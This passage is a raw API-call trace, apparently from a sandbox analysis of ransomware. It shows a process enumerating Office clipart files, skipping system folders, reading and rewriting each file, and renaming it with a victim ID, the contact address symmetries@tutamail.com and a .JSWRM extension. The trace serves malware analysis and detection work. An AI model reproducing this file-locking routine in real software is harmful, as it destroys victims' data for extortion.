lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00199_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00199_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00199_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00199_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00199_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.649] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5630) returned 1 [0095.649] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15f0) returned 0x205850 [0095.650] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x15f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x15f0, lpOverlapped=0x0) returned 1 [0095.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.651] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x15f0, lpOverlapped=0x0) returned 1 [0095.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.652] CloseHandle (hObject=0x314) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0095.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0095.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0095.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0095.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0095.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00199_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00199_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00199_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0095.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.653] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00200_.WMF", cAlternateFileName="")) returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2=".") returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="..") returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="...") returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="windows") returned -1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="recovery") returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="perflogs") returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="documents and settings") returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="system volume information") returned -1 [0095.653] lstrcmpiW (lpString1="SO00200_.WMF", lpString2="msocache") returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00200_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00200_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00200_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0095.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00200_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00200_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00200_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0095.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0095.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.654] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10534) returned 1 [0095.654] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2920) returned 0x24d210 [0095.654] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2920, lpOverlapped=0x0) returned 1 [0095.657] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.657] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2920, lpOverlapped=0x0) returned 1 [0095.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.657] CloseHandle (hObject=0x314) returned 1 [0095.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0095.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0095.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0095.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0095.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0095.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00200_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00200_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00200_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0095.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0095.658] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ea0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00208_.WMF", cAlternateFileName="")) returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2=".") returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="..") returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="...") returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="windows") returned -1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="recovery") returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="perflogs") returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="documents and settings") returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="system volume information") returned -1 [0095.658] lstrcmpiW (lpString1="SO00208_.WMF", lpString2="msocache") returned 1 [0095.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00208_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00208_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00208_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0095.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00208_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00208_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00208_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0095.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00208_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.660] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11936) returned 1 [0095.660] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ea0) returned 0x24d210 [0095.660] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ea0, lpOverlapped=0x0) returned 1 [0095.662] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.662] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ea0, lpOverlapped=0x0) returned 1 [0095.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.662] CloseHandle (hObject=0x314) returned 1 [0095.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0095.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0095.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0095.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0095.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0095.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.666] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00208_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00208_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00208_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0095.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0095.771] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f72, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00212_.WMF", cAlternateFileName="")) returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2=".") returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="..") returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="...") returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="windows") returned -1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="recovery") returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="perflogs") returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="documents and settings") returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="system volume information") returned -1 [0095.771] lstrcmpiW (lpString1="SO00212_.WMF", lpString2="msocache") returned 1 [0095.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00212_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00212_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00212_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0095.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00212_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00212_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00212_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0095.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0095.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00212_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00212_.wmf"), 